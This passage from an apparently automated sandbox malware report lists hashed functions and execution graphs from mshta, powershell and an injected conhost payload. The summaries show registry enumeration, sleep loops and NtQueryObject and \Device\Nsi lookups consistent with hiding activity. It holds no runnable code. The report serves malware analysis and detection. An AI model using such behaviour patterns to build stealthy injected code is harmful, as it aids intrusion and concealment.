                                                                    • Instruction Fuzzy Hash: A290020459550A76D81411960C9A26C5043638D160FD54482442690544DC4E12972153
                                                                    Function 000002AECD000F69 Relevance: .0, Instructions: 5COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000003.2285965734.000002AECD000000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002AECD000000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_3_2aecd000000_mshta.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7138bbfc8f3f255ef01850f78d10a34422efde96c889ed009d55ad33e92055be
                                                                    • Instruction ID: 0c62ca3f676dcf33fdb39a83d0eadf82c56f076ff8266d12996fbfd6da814300
                                                                    • Opcode Fuzzy Hash: 7138bbfc8f3f255ef01850f78d10a34422efde96c889ed009d55ad33e92055be
                                                                    • Instruction Fuzzy Hash: A290020459550A76D81411960C9A26C5043638D160FD54482442690544DC4E12972153
                                                                    Function 000002AECD000F71 Relevance: .0, Instructions: 5COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000003.2285965734.000002AECD000000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002AECD000000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_3_2aecd000000_mshta.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7138bbfc8f3f255ef01850f78d10a34422efde96c889ed009d55ad33e92055be
                                                                    • Instruction ID: 0c62ca3f676dcf33fdb39a83d0eadf82c56f076ff8266d12996fbfd6da814300
                                                                    • Opcode Fuzzy Hash: 7138bbfc8f3f255ef01850f78d10a34422efde96c889ed009d55ad33e92055be
                                                                    • Instruction Fuzzy Hash: A290020459550A76D81411960C9A26C5043638D160FD54482442690544DC4E12972153
                                                                    Function 000002AECD000F79 Relevance: .0, Instructions: 5COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000003.2285965734.000002AECD000000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002AECD000000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_3_2aecd000000_mshta.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7138bbfc8f3f255ef01850f78d10a34422efde96c889ed009d55ad33e92055be
                                                                    • Instruction ID: 0c62ca3f676dcf33fdb39a83d0eadf82c56f076ff8266d12996fbfd6da814300
                                                                    • Opcode Fuzzy Hash: 7138bbfc8f3f255ef01850f78d10a34422efde96c889ed009d55ad33e92055be
                                                                    • Instruction Fuzzy Hash: A290020459550A76D81411960C9A26C5043638D160FD54482442690544DC4E12972153
                                                                    Function 000002AECD000F81 Relevance: .0, Instructions: 5COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000003.2285965734.000002AECD000000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002AECD000000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_3_2aecd000000_mshta.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7138bbfc8f3f255ef01850f78d10a34422efde96c889ed009d55ad33e92055be
                                                                    • Instruction ID: 0c62ca3f676dcf33fdb39a83d0eadf82c56f076ff8266d12996fbfd6da814300
                                                                    • Opcode Fuzzy Hash: 7138bbfc8f3f255ef01850f78d10a34422efde96c889ed009d55ad33e92055be
                                                                    • Instruction Fuzzy Hash: A290020459550A76D81411960C9A26C5043638D160FD54482442690544DC4E12972153
                                                                    Function 000002AECD000F89 Relevance: .0, Instructions: 5COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000003.2285965734.000002AECD000000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002AECD000000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_3_2aecd000000_mshta.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7138bbfc8f3f255ef01850f78d10a34422efde96c889ed009d55ad33e92055be
                                                                    • Instruction ID: 0c62ca3f676dcf33fdb39a83d0eadf82c56f076ff8266d12996fbfd6da814300
                                                                    • Opcode Fuzzy Hash: 7138bbfc8f3f255ef01850f78d10a34422efde96c889ed009d55ad33e92055be
                                                                    • Instruction Fuzzy Hash: A290020459550A76D81411960C9A26C5043638D160FD54482442690544DC4E12972153
                                                                    Function 000002AECD000F91 Relevance: .0, Instructions: 5COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000003.2285965734.000002AECD000000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002AECD000000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_3_2aecd000000_mshta.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7138bbfc8f3f255ef01850f78d10a34422efde96c889ed009d55ad33e92055be
                                                                    • Instruction ID: 0c62ca3f676dcf33fdb39a83d0eadf82c56f076ff8266d12996fbfd6da814300
                                                                    • Opcode Fuzzy Hash: 7138bbfc8f3f255ef01850f78d10a34422efde96c889ed009d55ad33e92055be
                                                                    • Instruction Fuzzy Hash: A290020459550A76D81411960C9A26C5043638D160FD54482442690544DC4E12972153
                                                                    Function 000002AECD000FC1 Relevance: .0, Instructions: 5COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000003.2285965734.000002AECD000000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002AECD000000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_3_2aecd000000_mshta.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7138bbfc8f3f255ef01850f78d10a34422efde96c889ed009d55ad33e92055be
                                                                    • Instruction ID: 0c62ca3f676dcf33fdb39a83d0eadf82c56f076ff8266d12996fbfd6da814300
                                                                    • Opcode Fuzzy Hash: 7138bbfc8f3f255ef01850f78d10a34422efde96c889ed009d55ad33e92055be
                                                                    • Instruction Fuzzy Hash: A290020459550A76D81411960C9A26C5043638D160FD54482442690544DC4E12972153

                                                                    Executed Functions

                                                                    Function 00007FFD3419208A Relevance: .1, Instructions: 87COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2897692471.00007FFD34190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34190000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_7ffd34190000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3fd9fccea48ca815ac0a60f2b84eebf16175e940cc12dcab38f42f967e5d2942
                                                                    • Instruction ID: 5dea342a761bf2f3e611ad3ff395c653555d554b3e002679740c1def0f94b061
                                                                    • Opcode Fuzzy Hash: 3fd9fccea48ca815ac0a60f2b84eebf16175e940cc12dcab38f42f967e5d2942
                                                                    • Instruction Fuzzy Hash: 0F210723F0EF4A1FE3E6AA6C14A5174A2C2EF86350B8804BAD10CC3197ED2DEC019285
                                                                    Function 00007FFD34190D1E Relevance: .1, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2897692471.00007FFD34190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34190000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_7ffd34190000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7dc53f50c23957f9b8901a1128ee8d88f1ef8327bc4663bf2b5fb22b0fdcd9d2
                                                                    • Instruction ID: dea574dd1fffa7c2c17db96d670111a10209d25aee3c91bdb9f6a3ff4b3dd998
                                                                    • Opcode Fuzzy Hash: 7dc53f50c23957f9b8901a1128ee8d88f1ef8327bc4663bf2b5fb22b0fdcd9d2
                                                                    • Instruction Fuzzy Hash: 4001B923F0EE9A4FE7E6AA6C14B51B865D1EF5A25174800BBD50DC71D3DD1DBC015380
                                                                    Function 00007FFD340C37B5 Relevance: .0, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2896288014.00007FFD340C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_7ffd340c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5cd7bdb080d301f13d20f0c778934d2b47bcc6878ebb588afffc52a1ce257a2a
                                                                    • Instruction ID: d99f7c72f0f9fd7cbdee9d46e2c2396bc985ae647e10b526e7e157dba6c33298
                                                                    • Opcode Fuzzy Hash: 5cd7bdb080d301f13d20f0c778934d2b47bcc6878ebb588afffc52a1ce257a2a
                                                                    • Instruction Fuzzy Hash: 6C01A77021CB0C8FDB44EF0CE091AA6B3E0FB89320F10052DE58AC3691D736E882CB41

                                                                    Execution Graph

                                                                    Execution Coverage:0.7%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:74
                                                                    Total number of Limit Nodes:2
                                                                    execution_graph 14984 1dcafc1273c 14986 1dcafc1276a 14984->14986 14985 1dcafc12858 LoadLibraryA 14985->14986 14986->14985 14987 1dcafc128d4 14986->14987 14988 1dcb14e1abc 14993 1dcb14e1628 GetProcessHeap 14988->14993 14990 1dcb14e1ad2 Sleep SleepEx 14991 1dcb14e1acb 14990->14991 14991->14990 14992 1dcb14e1598 StrCmpIW StrCmpW 14991->14992 14992->14991 14994 1dcb14e1648 __free_lconv_num 14993->14994 15038 1dcb14e1268 GetProcessHeap 14994->15038 14996 1dcb14e1650 14997 1dcb14e1268 2 API calls 14996->14997 14998 1dcb14e1661 14997->14998 14999 1dcb14e1268 2 API calls 14998->14999 15000 1dcb14e166a 14999->15000 15001 1dcb14e1268 2 API calls 15000->15001 15002 1dcb14e1673 15001->15002 15003 1dcb14e168e RegOpenKeyExW 15002->15003 15004 1dcb14e18a6 15003->15004 15005 1dcb14e16c0 RegOpenKeyExW 15003->15005 15004->14991 15006 1dcb14e16e9 15005->15006 15007 1dcb14e16ff RegOpenKeyExW 15005->15007 15042 1dcb14e12bc RegQueryInfoKeyW 15006->15042 15009 1dcb14e173a RegOpenKeyExW 15007->15009 15010 1dcb14e1723 15007->15010 15013 1dcb14e1775 RegOpenKeyExW 15009->15013 15014 1dcb14e175e 15009->15014 15053 1dcb14e104c RegQueryInfoKeyW 15010->15053 15017 1dcb14e1799 15013->15017 15018 1dcb14e17b0 RegOpenKeyExW 15013->15018 15016 1dcb14e12bc 13 API calls 15014->15016 15021 1dcb14e176b RegCloseKey 15016->15021 15022 1dcb14e12bc 13 API calls 15017->15022 15019 1dcb14e17eb RegOpenKeyExW 15018->15019 15020 1dcb14e17d4 15018->15020 15024 1dcb14e1826 RegOpenKeyExW 15019->15024 15025 1dcb14e180f 15019->15025 15023 1dcb14e12bc 13 API calls 15020->15023 15021->15013 15026 1dcb14e17a6 RegCloseKey 15022->15026 15027 1dcb14e17e1 RegCloseKey 15023->15027 15029 1dcb14e184a 15024->15029 15030 1dcb14e1861 RegOpenKeyExW 15024->15030 15028 1dcb14e104c 5 API calls 15025->15028 15026->15018 15027->15019 15031 1dcb14e181c RegCloseKey 15028->15031 15032 1dcb14e104c 5 API calls 15029->15032 15033 1dcb14e1885 15030->15033 15034 1dcb14e189c RegCloseKey 15030->15034 15031->15024 15035 1dcb14e1857 RegCloseKey 15032->15035 15036 1dcb14e104c 5 API calls 15033->15036 15034->15004 15035->15030 15037 1dcb14e1892 RegCloseKey 15036->15037 15037->15034 15059 1dcb14f6168 15038->15059 15040 1dcb14e1283 GetProcessHeap 15041 1dcb14e12ae __free_lconv_num 15040->15041 15041->14996 15043 1dcb14e148a RegCloseKey 15042->15043 15044 1dcb14e1327 GetProcessHeap 15042->15044 15043->15007 15050 1dcb14e133e __free_lconv_num 15044->15050 15045 1dcb14e1476 GetProcessHeap HeapFree 15045->15043 15046 1dcb14e1352 RegEnumValueW 15046->15050 15048 1dcb14e13d3 GetProcessHeap 15048->15050 15049 1dcb14e141e lstrlenW GetProcessHeap 15049->15050 15050->15045 15050->15046 15050->15048 15050->15049 15051 1dcb14e13f3 GetProcessHeap HeapFree 15050->15051 15052 1dcb14e1443 StrCpyW 15050->15052 15061 1dcb14e152c 15050->15061 15051->15049 15052->15050 15054 1dcb14e11b5 RegCloseKey 15053->15054 15055 1dcb14e10bf __free_lconv_num 15053->15055 15054->15009 15055->15054 15056 1dcb14e10cf RegEnumValueW 15055->15056 15057 1dcb14e114e GetProcessHeap 15055->15057 15058 1dcb14e116e GetProcessHeap HeapFree 15055->15058 15056->15055 15057->15055 15058->15055 15060 1dcb14f6177 15059->15060 15062 1dcb14e157c 15061->15062 15065 1dcb14e1546 15061->15065 15062->15050 15063 1dcb14e1565 StrCmpW 15063->15065 15064 1dcb14e155d StrCmpIW 15064->15065 15065->15062 15065->15063 15065->15064

                                                                    Executed Functions

                                                                    Function 000001DCB14E328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                    • String ID:
                                                                    • API String ID: 1683269324-0
                                                                    • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                    • Instruction ID: 5bb64984ff3019b2dc74c9f03e9d9bb8f7f6ff03899a5b59318e04077f3ce1ea
                                                                    • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                    • Instruction Fuzzy Hash: A411657261064385FB6A9761F44BBE92294BBD47C4F50CB27950A41699EF78C648CEC0
                                                                    Function 000001DCB14E1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 000001DCB14E1628: GetProcessHeap.KERNEL32 ref: 000001DCB14E1633
                                                                      • Part of subcall function 000001DCB14E1628: HeapAlloc.KERNEL32 ref: 000001DCB14E1642
                                                                      • Part of subcall function 000001DCB14E1628: RegOpenKeyExW.ADVAPI32 ref: 000001DCB14E16B2
                                                                      • Part of subcall function 000001DCB14E1628: RegOpenKeyExW.ADVAPI32 ref: 000001DCB14E16DF
                                                                      • Part of subcall function 000001DCB14E1628: RegCloseKey.ADVAPI32 ref: 000001DCB14E16F9
                                                                      • Part of subcall function 000001DCB14E1628: RegOpenKeyExW.ADVAPI32 ref: 000001DCB14E1719
                                                                      • Part of subcall function 000001DCB14E1628: RegCloseKey.ADVAPI32 ref: 000001DCB14E1734
                                                                      • Part of subcall function 000001DCB14E1628: RegOpenKeyExW.ADVAPI32 ref: 000001DCB14E1754
                                                                      • Part of subcall function 000001DCB14E1628: RegCloseKey.ADVAPI32 ref: 000001DCB14E176F
                                                                      • Part of subcall function 000001DCB14E1628: RegOpenKeyExW.ADVAPI32 ref: 000001DCB14E178F
                                                                      • Part of subcall function 000001DCB14E1628: RegCloseKey.ADVAPI32 ref: 000001DCB14E17AA
                                                                      • Part of subcall function 000001DCB14E1628: RegOpenKeyExW.ADVAPI32 ref: 000001DCB14E17CA
                                                                    • Sleep.KERNEL32 ref: 000001DCB14E1AD7
                                                                    • SleepEx.KERNELBASE ref: 000001DCB14E1ADD
                                                                      • Part of subcall function 000001DCB14E1628: RegCloseKey.ADVAPI32 ref: 000001DCB14E17E5
                                                                      • Part of subcall function 000001DCB14E1628: RegOpenKeyExW.ADVAPI32 ref: 000001DCB14E1805
                                                                      • Part of subcall function 000001DCB14E1628: RegCloseKey.ADVAPI32 ref: 000001DCB14E1820
                                                                      • Part of subcall function 000001DCB14E1628: RegOpenKeyExW.ADVAPI32 ref: 000001DCB14E1840
                                                                      • Part of subcall function 000001DCB14E1628: RegCloseKey.ADVAPI32 ref: 000001DCB14E185B
                                                                      • Part of subcall function 000001DCB14E1628: RegOpenKeyExW.ADVAPI32 ref: 000001DCB14E187B
                                                                      • Part of subcall function 000001DCB14E1628: RegCloseKey.ADVAPI32 ref: 000001DCB14E1896
                                                                      • Part of subcall function 000001DCB14E1628: RegCloseKey.ADVAPI32 ref: 000001DCB14E18A0
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                    • String ID:
                                                                    • API String ID: 1534210851-0
                                                                    • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                    • Instruction ID: 6d6dc646fd75f4b042d0483313952ee227d6452ceec334e157cb3eb1c270aaa6
                                                                    • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                    • Instruction Fuzzy Hash: 4331F073250647D6FF589B26DA433E913A4ABC5FC4F089E239E0D8769EEE14C451CA90
                                                                    Function 000001DCAFC1273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915198787.000001DCAFC10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001DCAFC10000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcafc10000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                    • Instruction ID: 843578725e39ed8af405fb067f3e669f01228159d9f0f1d646b6c65344831acc
                                                                    • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                    • Instruction Fuzzy Hash: 3761E33BB0169A87EF64CF1A94007E9B392F754B98F198522EE59077C4FB34D862C784

                                                                    Non-executed Functions

                                                                    Function 000001DCB14E2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 363 1dcb14e2b2c-1dcb14e2ba5 call 1dcb1502ce0 366 1dcb14e2bab-1dcb14e2bb1 363->366 367 1dcb14e2ee0-1dcb14e2f03 363->367 366->367 368 1dcb14e2bb7-1dcb14e2bba 366->368 368->367 369 1dcb14e2bc0-1dcb14e2bc3 368->369 369->367 370 1dcb14e2bc9-1dcb14e2bd9 GetModuleHandleA 369->370 371 1dcb14e2bdb-1dcb14e2beb call 1dcb14f6090 370->371 372 1dcb14e2bed 370->372 374 1dcb14e2bf0-1dcb14e2c0e 371->374 372->374 374->367 377 1dcb14e2c14-1dcb14e2c33 StrCmpNIW 374->377 377->367 378 1dcb14e2c39-1dcb14e2c3d 377->378 378->367 379 1dcb14e2c43-1dcb14e2c4d 378->379 379->367 380 1dcb14e2c53-1dcb14e2c5a 379->380 380->367 381 1dcb14e2c60-1dcb14e2c73 380->381 382 1dcb14e2c75-1dcb14e2c81 381->382 383 1dcb14e2c83 381->383 384 1dcb14e2c86-1dcb14e2c8a 382->384 383->384 385 1dcb14e2c9a 384->385 386 1dcb14e2c8c-1dcb14e2c98 384->386 387 1dcb14e2c9d-1dcb14e2ca7 385->387 386->387 388 1dcb14e2d9d-1dcb14e2da1 387->388 389 1dcb14e2cad-1dcb14e2cb0 387->389 390 1dcb14e2da7-1dcb14e2daa 388->390 391 1dcb14e2ed2-1dcb14e2eda 388->391 392 1dcb14e2cc2-1dcb14e2ccc 389->392 393 1dcb14e2cb2-1dcb14e2cbf call 1dcb14e199c 389->393 394 1dcb14e2dbb-1dcb14e2dc5 390->394 395 1dcb14e2dac-1dcb14e2db8 call 1dcb14e199c 390->395 391->367 391->381 397 1dcb14e2d00-1dcb14e2d0a 392->397 398 1dcb14e2cce-1dcb14e2cdb 392->398 393->392 400 1dcb14e2dc7-1dcb14e2dd4 394->400 401 1dcb14e2df5-1dcb14e2df8 394->401 395->394 404 1dcb14e2d3a-1dcb14e2d3d 397->404 405 1dcb14e2d0c-1dcb14e2d19 397->405 398->397 403 1dcb14e2cdd-1dcb14e2cea 398->403 400->401 410 1dcb14e2dd6-1dcb14e2de3 400->410 411 1dcb14e2dfa-1dcb14e2e03 call 1dcb14e1bbc 401->411 412 1dcb14e2e05-1dcb14e2e12 lstrlenW 401->412 413 1dcb14e2ced-1dcb14e2cf3 403->413 408 1dcb14e2d4b-1dcb14e2d58 lstrlenW 404->408 409 1dcb14e2d3f-1dcb14e2d49 call 1dcb14e1bbc 404->409 405->404 406 1dcb14e2d1b-1dcb14e2d28 405->406 414 1dcb14e2d2b-1dcb14e2d31 406->414 416 1dcb14e2d5a-1dcb14e2d64 408->416 417 1dcb14e2d7b-1dcb14e2d8d call 1dcb14e3844 408->417 409->408 421 1dcb14e2d93-1dcb14e2d98 409->421 418 1dcb14e2de6-1dcb14e2dec 410->418 411->412 430 1dcb14e2e4a-1dcb14e2e55 411->430 422 1dcb14e2e14-1dcb14e2e1e 412->422 423 1dcb14e2e35-1dcb14e2e3f call 1dcb14e3844 412->423 420 1dcb14e2cf9-1dcb14e2cfe 413->420 413->421 414->421 426 1dcb14e2d33-1dcb14e2d38 414->426 416->417 429 1dcb14e2d66-1dcb14e2d79 call 1dcb14e152c 416->429 417->421 424 1dcb14e2e42-1dcb14e2e44 417->424 418->430 431 1dcb14e2dee-1dcb14e2df3 418->431 420->397 420->413 421->424 422->423 425 1dcb14e2e20-1dcb14e2e33 call 1dcb14e152c 422->425 423->424 424->391 424->430 425->423 425->430 426->404 426->414 429->417 429->421 436 1dcb14e2e57-1dcb14e2e5b 430->436 437 1dcb14e2ecc-1dcb14e2ed0 430->437 431->401 431->418 441 1dcb14e2e63-1dcb14e2e7d call 1dcb14e85c0 436->441 442 1dcb14e2e5d-1dcb14e2e61 436->442 437->391 444 1dcb14e2e80-1dcb14e2e83 441->444 442->441 442->444 447 1dcb14e2ea6-1dcb14e2ea9 444->447 448 1dcb14e2e85-1dcb14e2ea3 call 1dcb14e85c0 444->448 447->437 449 1dcb14e2eab-1dcb14e2ec9 call 1dcb14e85c0 447->449 448->447 449->437
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                    • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                    • API String ID: 2119608203-3850299575
                                                                    • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                    • Instruction ID: b457e0666debee1e014178a80a3172861fab78f03d448e945b173b0042818b7e
                                                                    • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                    • Instruction Fuzzy Hash: 6BB18F73210A6286EB698F29D442BE963A5F788BD4F449A17EE095379CDF35CC41CB80
                                                                    Function 000001DCB14E7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                    • String ID:
                                                                    • API String ID: 3140674995-0
                                                                    • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                    • Instruction ID: 9e6a10b5be5cfd9b3c2c8ed45ca8a304f9d697aa6579d92f3c2b4e346521bce6
                                                                    • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                    • Instruction Fuzzy Hash: E2316D77205B818AEB64DF60E8817EE7360F784794F44492BDA4E57B98EF38C648CB50
                                                                    Function 000001DCB14ED2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                    • String ID:
                                                                    • API String ID: 1239891234-0
                                                                    • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                    • Instruction ID: b68343837b6fad82080331d8641453ecb2096441465f1c65e3496a047100e18d
                                                                    • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                    • Instruction Fuzzy Hash: F2315B36214B8186EB64CF25E8813DE73A4F7C9794F504627EA9D43B98DF38C556CB80
                                                                    Function 000001DCB14E7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                    • String ID:
                                                                    • API String ID: 2933794660-0
                                                                    • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                    • Instruction ID: 4b87a4bb231a6b4ef035a2c95b205faaa5d7818fc592362f06f136662878733b
                                                                    • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                    • Instruction Fuzzy Hash: 6311FE36710F068AEF00CF60E8553A833A4F759798F441E27DA6D467A8DB78C198C780
                                                                    Function 000001DCB14EDCE0 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                    • Instruction ID: 3a5a2eeb82f1852efb6e57219e8fea19996ab9731aa393f2074d8804fcebe8f9
                                                                    • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                    • Instruction Fuzzy Hash: 7551F53370069189FB24DB72A8417DA7BA1F7847E4F148A27EE5C67B9DDA38C001CB40
                                                                    Function 000001DCB14EF830 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2915463896.000001DCB14E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001DCB14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_1dcb14e0000_conhost.jbxd
                                                                    Similarity
